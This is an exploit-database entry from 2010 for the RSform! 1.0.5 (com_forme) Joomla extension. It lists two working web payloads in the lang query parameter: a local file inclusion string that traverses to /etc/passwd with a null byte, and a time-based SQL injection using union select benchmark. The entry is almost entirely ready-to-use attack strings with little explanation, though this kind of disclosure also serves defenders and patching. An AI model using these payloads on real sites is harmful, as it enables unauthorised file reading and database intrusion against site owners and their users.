Joomla 1.0.5 com_forme Multiple Vulnerabilities

2010-11-07T00:00:00
ID 1337DAY-ID-14751
Type zdt
Reporter jdc
Modified 2010-11-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================
Joomla 1.0.5 com_forme Multiple Vulnerabilities
===============================================

# Exploit Title: RSform! 1.0.5 (Joomla) Multiple Vulnerabilities
# Date: 06.11.2010
# Author: jdc
# Software Link:
http://extensions.joomla.org/extensions/contacts-and-feedback/forms/2265
# Version: 1.0.5
 
Local File Include
------------------
?option=com_forme
〈=../../../../../../../../../etc/passwd%00
 
SQL Injection
-------------
?option=com_forme
〈=-1' union select benchmark(1000000,md5(1)) -- '
 
NOTE: RSform! Pro is not affected...
 
6 Nov 2010
jdc



#  0day.today [2018-02-06]  #